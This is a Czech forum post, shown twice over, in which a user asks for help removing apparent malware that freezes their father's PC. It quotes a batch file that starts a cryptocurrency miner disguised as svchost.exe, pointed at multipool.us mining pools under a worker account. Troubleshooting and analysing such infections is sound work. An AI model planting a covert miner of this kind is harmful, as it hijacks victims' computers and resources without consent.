processswi
Napsal: 25 úno 2014 08:28
Dobrý den,
celý včerejšek sem řešil po telefonu s otcem tento problém:
po 5 min nečinnosti na PC naskočí proces svchost.exe,vytíží procesor na 100% pc se sekne, vyskočí modrá smrt a pc se restartuje. Dle správce úloh jsem zjistil, že se spouští bat soubor system.bat ve kterém je toto:
wmic process where name="ProcessSwi.exe" CALL setpriority "64"
c:\Windows\globalization\Updater\svchost.exe -o stratum+tcp://pool1.eu.multipool.us:3352 -u tommyi.ppc -p x -o stratum+tcp://us-west.multipool.us:3352 -u tommyi.ppc -p x
něják nechápu co tento bat vlastně dělá? Nicméně jsme tedy smazali složku updater, následně jsme ji vyhledali v registrech, kde jsme ji také smazali, následně jsme vyhledali všechny výskyty processswi a tyto řetězce také smazali. Pc nyní nezamrzá a tyto procesy už nenaskakuje, ovšem po přihlášení do win vyskočí: průzkumník, kde je zobrazeno místní disk C a vyskočí: Nastavení programu Windows Script Host, po kliknutí na ok vše jede bezproblému, nicméně asi někde něco zůstalo co se snaží spustit onen trojan (tipuji). (v msconfig se zobrazuje položka WindowsUpdate, která odkazuje na zmíněný smazaný Updater, tuto položku jsme odškrtli, přesto po příhlášení stále vyskakuje Windows Script host nastavení) Máte s tímto někdo zkušenosti? Co ještě je potřeba udělat? Na co si dát pozor? A co vlastně tento škodlivý software prováděl? Za jakékoli rady, odpovědě děkuji.
celý včerejšek sem řešil po telefonu s otcem tento problém:
po 5 min nečinnosti na PC naskočí proces svchost.exe,vytíží procesor na 100% pc se sekne, vyskočí modrá smrt a pc se restartuje. Dle správce úloh jsem zjistil, že se spouští bat soubor system.bat ve kterém je toto:
wmic process where name="ProcessSwi.exe" CALL setpriority "64"
c:\Windows\globalization\Updater\svchost.exe -o stratum+tcp://pool1.eu.multipool.us:3352 -u tommyi.ppc -p x -o stratum+tcp://us-west.multipool.us:3352 -u tommyi.ppc -p x
něják nechápu co tento bat vlastně dělá? Nicméně jsme tedy smazali složku updater, následně jsme ji vyhledali v registrech, kde jsme ji také smazali, následně jsme vyhledali všechny výskyty processswi a tyto řetězce také smazali. Pc nyní nezamrzá a tyto procesy už nenaskakuje, ovšem po přihlášení do win vyskočí: průzkumník, kde je zobrazeno místní disk C a vyskočí: Nastavení programu Windows Script Host, po kliknutí na ok vše jede bezproblému, nicméně asi někde něco zůstalo co se snaží spustit onen trojan (tipuji). (v msconfig se zobrazuje položka WindowsUpdate, která odkazuje na zmíněný smazaný Updater, tuto položku jsme odškrtli, přesto po příhlášení stále vyskakuje Windows Script host nastavení) Máte s tímto někdo zkušenosti? Co ještě je potřeba udělat? Na co si dát pozor? A co vlastně tento škodlivý software prováděl? Za jakékoli rady, odpovědě děkuji.
